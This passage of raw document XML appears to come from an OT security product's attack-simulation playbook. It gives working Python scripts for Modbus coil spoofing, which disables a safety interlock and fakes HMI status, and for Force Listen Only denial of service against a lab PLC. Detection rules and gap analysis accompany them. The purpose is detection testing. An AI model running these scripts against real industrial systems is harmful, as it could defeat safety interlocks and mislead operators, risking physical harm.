          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Coils are single-bit boolean outputs — typically mapped to physical interlocks, alarm enables, valve positions. An attacker who can write coils can either disable a safety interlock (set coil = 0) or fake an 'all clear' indicator that the HMI then displays to the operator. Unlike scenario 02, the attacker may already be inside L2/L3 and write to L1 without obviously crossing zones — the danger is in *which* coil is being written.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Drive a single Force Single Coil (FC 0x05) with value 0xFF00 (= ON) at the safety-interlock coil address. To make it visible in the demo, also flip a 'pump running' indicator coil so the HMI claims the pump is on while the field state actually disagrees.</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scenario03_coil_spoof.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from pymodbus.client import ModbusTcpClient</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC = '10.10.2.20'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>INTERLOCK_COIL = 17       # safety interlock — should be 0 when door open</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUMP_RUNNING_COIL = 33    # HMI status indicator</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>with ModbusTcpClient(PLC, source_address=('10.10.1.10', 0)) as c:</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Disable interlock</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    c.write_coil(INTERLOCK_COIL, True, slave=1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    # Falsely report pump running</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    c.write_coil(PUMP_RUNNING_COIL, True, slave=1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    print('coils written — operator now sees an inconsistent picture')</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The source </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>10.10.1.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> is intentionally an HMI (L2 → L1) so the cross-zone rule does *not* fire — this is the harder case where the attacker has already lived-off-the-land on the HMI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>If the lab has a tag dictionary file for the simulated PLC, label coil 17 in the demo deck so the audience sees the operational meaning.</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dpi.unauthorized_write — does NOT fire (same-zone write)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rule ID (gap)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.value_baseline — to be implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Write to a coil whose state has been stable for ≥ 24h, or whose value diverges from a paired sensor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (target)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>T0832 — Manipulation of View</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>UI verification path:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Today: confirm the write is *visible* in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Topology → DPI modal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the L2 → L1 edge — sparkline shows a coil-write PDU. No anomaly is auto-generated.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Workaround for demo: filter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DPI Events</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>functionCode = 0x05</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, sort by time, spot the unexpected write. Useful to show the raw evidence is captured even when the rule layer is silent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After the gap rule lands: anomaly will appear with title </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Suspicious coil write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> and indicator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>coil_address:17 baseline_drift_h:&gt;24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B91C1C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>IMPACT NARRATIVE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>This is the class of attack used in the 2015 Ukraine power-grid incident — operator confidence is the target, not just process state:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Manipulation of view</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — operator's HMI tells a story that no longer matches field reality. Manual interventions become wrong by construction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Interlock bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — disabling a safety coil opens a window during which a subsequent malicious write (scenario 02) goes uncontested.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Slow-burn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — coils flipped one at a time over hours blend into the noise of normal HMI activity. Without a baseline rule, the only forensic trail is the raw DPI event log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="92400E"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GAP ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>OTShield's current rule set is intentionally protocol-syntactic; this scenario needs *semantic* baselining to catch:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Value-baseline rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — learn the normal write rate / write-source distribution per coil over a rolling window; flag deviations. Suggested config: per-(asset, coil) EWMA with α=0.05.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>HMI-PLC pairing rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — model which HMI 'owns' which coils; flag writes from an HMI that has historically only *read* this coil.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Tag-dictionary integration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — accept a customer-supplied CSV mapping coil addresses to functional names (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>coil_17 = SAFETY_DOOR_INTERLOCK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">); raise severity automatically when the tag name matches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*SAFETY*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*INTERLOCK*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>*EMER*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="6B7280"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scenario 04  ·  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="34"/>
        </w:rPr>
        <w:t>Rare diagnostic function code abuse</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T0858 — Change Operating Mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity (expected)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Protocol(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Modbus TCP (FC 0x08 sub-functions)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Kill-chain phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Inhibit Response Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>THREAT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Modbus FC 0x08 (Diagnostics) has 18 sub-functions — most of which are rarely seen in production traffic. Sub-function 0x01 (Restart Communications Option) and 0x04 (Force Listen Only Mode) are particularly nasty: they cause the slave to drop or stop responding to all subsequent commands, effectively DoS-ing the device while looking like a routine diagnostic poll.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1D4ED8"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>REPRODUCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Send a single FC 0x08 PDU with sub-function 0x04 (Force Listen Only). The slave will accept the command and stop responding to writes from *anyone*, including the legitimate HMI.</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scenario04_force_listen_only.py</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>from scapy.all import IP, TCP, Raw, sr1</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>import struct</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PLC = '10.10.2.20'</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>tid = 0x1234</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>mbap = struct.pack('&gt;HHHB', tid, 0, 6, 1)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t># PDU: fc=0x08, sub-function=0x0004 (Force Listen Only), data=0x0000</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pdu  = struct.pack('&gt;BHH', 0x08, 0x0004, 0x0000)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>pkt  = IP(dst=PLC)/TCP(dport=502, flags='PA')/Raw(load=mbap+pdu)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>rsp  = sr1(pkt, timeout=2)</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>print('PLC is now in listen-only mode — try writing a coil to confirm DoS')</w:t>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Diagnostic FCs are uncommon in production — the rule fires on first observation regardless of source/destination Purdue levels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>After the demo, send sub-function 0x01 (Restart Communications) to take the slave out of listen-only mode and continue the next scenario.</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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>dpi.rare_function_code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>RareFunctionCodeRule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Function code with global historical count &lt; RARE_THRESHOLD (3)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F9FAFB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="374151"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7056"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:color w:val="111827"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>MEDIUM if first-seen (count = 0), else LOW</w:t>
            </w:r>
          </w:p>
        </w:tc>
